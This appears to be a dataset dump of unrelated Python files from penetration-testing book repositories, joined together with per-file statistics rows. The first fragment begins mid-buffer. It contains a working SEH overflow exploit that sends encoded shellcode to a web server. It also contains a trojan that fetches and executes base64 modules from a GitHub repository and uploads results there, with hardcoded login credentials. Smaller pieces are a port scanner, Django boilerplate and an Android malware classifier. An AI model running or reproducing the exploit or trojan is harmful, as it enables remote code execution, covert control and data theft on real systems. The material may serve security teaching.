buf += "\x16\x82\x65\xd9\x1e\x77\x3d\xd8\x0f\x26\x35\x83\x8f"
buf += "\xc9\x9a\xbf\x99\xd1\xff\xfa\x50\x6a\xcb\x71\x63\xba"
buf += "\x05\x79\xc8\x83\xa9\x88\x10\xc4\x0e\x73\x67\x3c\x6d"
buf += "\x0e\x70\xfb\x0f\xd4\xf5\x1f\xb7\x9f\xae\xfb\x49\x73"
buf += "\x28\x88\x46\x38\x3e\xd6\x4a\xbf\x93\x6d\x76\x34\x12"
buf += "\xa1\xfe\x0e\x31\x65\x5a\xd4\x58\x3c\x06\xbb\x65\x5e"
buf += "\xe9\x64\xc0\x15\x04\x70\x79\x74\x41\xb5\xb0\x86\x91"
buf += "\xd1\xc3\xf5\xa3\x7e\x78\x91\x8f\xf7\xa6\x66\xef\x2d"
buf += "\x1e\xf8\x0e\xce\x5f\xd1\xd4\x9a\x0f\x49\xfc\xa2\xdb"
buf += "\x89\x01\x77\x71\x81\xa4\x28\x64\x6c\x16\x99\x28\xde"
buf += "\xff\xf3\xa6\x01\x1f\xfc\x6c\x2a\x88\x01\x8f\x44\xa8"
buf += "\x8f\x69\x0e\x3a\xc6\x22\xa6\xf8\x3d\xfb\x51\x02\x14"
buf += "\x53\xf5\x4b\x7e\x64\xfa\x4b\x54\xc2\x6c\xc0\xbb\xd6"
buf += "\x8d\xd7\x91\x7e\xda\x40\x6f\xef\xa9\xf1\x70\x3a\x59"
buf += "\x91\xe3\xa1\x99\xdc\x1f\x7e\xce\x89\xee\x77\x9a\x27"
buf += "\x48\x2e\xb8\xb5\x0c\x09\x78\x62\xed\x94\x81\xe7\x49"
buf += "\xb3\x91\x31\x51\xff\xc5\xed\x04\xa9\xb3\x4b\xff\x1b"
buf += "\x6d\x02\xac\xf5\xf9\xd3\x9e\xc5\x7f\xdc\xca\xb3\x9f"
buf += "\x6d\xa3\x85\xa0\x42\x23\x02\xd9\xbe\xd3\xed\x30\x7b"
buf += "\xe3\xa7\x18\x2a\x6c\x6e\xc9\x6e\xf1\x91\x24\xac\x0c"
buf += "\x12\xcc\x4d\xeb\x0a\xa5\x48\xb7\x8c\x56\x21\xa8\x78"
buf += "\x58\x96\xc9\xa8"
injection = junk + nSEH + SEH + NOPs + buf
s = socket.socket()
s.connect(('192.168.129.128',80))
s.send("GET " + injection + " HTTP/1.0\r\n\r\n")
s.close()
| 43.066667 | 61 | 0.665994 |
cybersecurity-penetration-testing | import socket
rmip ='127.0.0.1'
portlist = [22,23,80,912,135,445,20]
for port in portlist:
sock= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
result = sock.connect_ex((rmip,port))
print port,":", result
sock.close()
| 18 | 55 | 0.700441 |
Hands-On-Penetration-Testing-with-Python | """
This file demonstrates writing tests using the unittest module. These will pass
when you run "manage.py test".
Replace this with more appropriate tests for your application.
"""
from django.test import TestCase
class SimpleTest(TestCase):
def test_basic_addition(self):
"""
Tests that 1 + 1 always equals 2.
"""
self.assertEqual(1 + 1, 2)
| 21.588235 | 79 | 0.67624 |
cybersecurity-penetration-testing | import json
import base64
import sys
import time
import imp
import random
import threading
import Queue
import os
from github3 import login
trojan_id = "abc"
trojan_config = "%s.json" % trojan_id
data_path = "data/%s/" % trojan_id
trojan_modules= []
task_queue = Queue.Queue()
configured = False
class GitImporter(object):
def __init__(self):
self.current_module_code = ""
def find_module(self,fullname,path=None):
if configured:
print "[*] Attempting to retrieve %s" % fullname
new_library = get_file_contents("modules/%s" % fullname)
if new_library is not None:
self.current_module_code = base64.b64decode(new_library)
return self
return None
def load_module(self,name):
module = imp.new_module(name)
exec self.current_module_code in module.__dict__
sys.modules[name] = module
return module
def connect_to_github():
gh = login(username="blackhatpythonbook",password="justin1234")
repo = gh.repository("blackhatpythonbook","chapter7")
branch = repo.branch("master")
return gh,repo,branch
def get_file_contents(filepath):
gh,repo,branch = connect_to_github()
tree = branch.commit.commit.tree.recurse()
for filename in tree.tree:
if filepath in filename.path:
print "[*] Found file %s" % filepath
blob = repo.blob(filename._json_data['sha'])
return blob.content
return None
def get_trojan_config():
global configured
config_json = get_file_contents(trojan_config)
config = json.loads(base64.b64decode(config_json))
configured = True
for task in config:
if task['module'] not in sys.modules:
exec("import %s" % task['module'])
return config
def store_module_result(data):
gh,repo,branch = connect_to_github()
remote_path = "data/%s/%d.data" % (trojan_id,random.randint(1000,100000))
repo.create_file(remote_path,"Commit message",base64.b64encode(data))
return
def module_runner(module):
task_queue.put(1)
result = sys.modules[module].run()
task_queue.get()
# store the result in our repo
store_module_result(result)
return
# main trojan loop
sys.meta_path = [GitImporter()]
while True:
if task_queue.empty():
config = get_trojan_config()
for task in config:
t = threading.Thread(target=module_runner,args=(task['module'],))
t.start()
time.sleep(random.randint(1,10))
time.sleep(random.randint(1000,10000))
| 21.438462 | 77 | 0.566529 |
Mastering-Machine-Learning-for-Penetration-Testing |
from sklearn.feature_selection import mutual_info_classif
from sklearn import preprocessing
import numpy as np
from sklearn.svm import SVC, LinearSVC
from sklearn import svm
import csv
import random
PRatio = 0.7
Dataset = open('Android_Feats.csv')
Reader = csv.reader(Dataset)
Data = list(Reader)
Data = random.sample(Data, len(Data))
Data = np.array(Data)
Dataset.close()
cols = np.shape(Data)[1]
Y = Data[:,cols-1]
Y = np.array(Y)
Y = np.ravel(Y,order='C')
X = Data[:,:cols-1]
X = X.astype(np.float)
X = preprocessing.scale(X)
Features = [i.strip() for i in open("Android_Feats.csv").readlines()]
Features = np.array(Features)
MI= mutual_info_classif(X,Y)
Featureind = sorted(range(len(MI)), key=lambda i: MI[i], reverse=True)[:50]
SelectFeats = Features[Featureind]
PRows = int(PRatio*len(Data))
TrainD = X[:PRows,Featureind]
TrainL = Y[:PRows]
TestD = X[PRows:,Featureind]
TestL = Y[PRows:]
clf = svm.SVC()
clf.fit(TrainD,TrainL)
score = clf.score(TestD,TestL)
print (score * 100)
| 21.590909 | 75 | 0.715005 |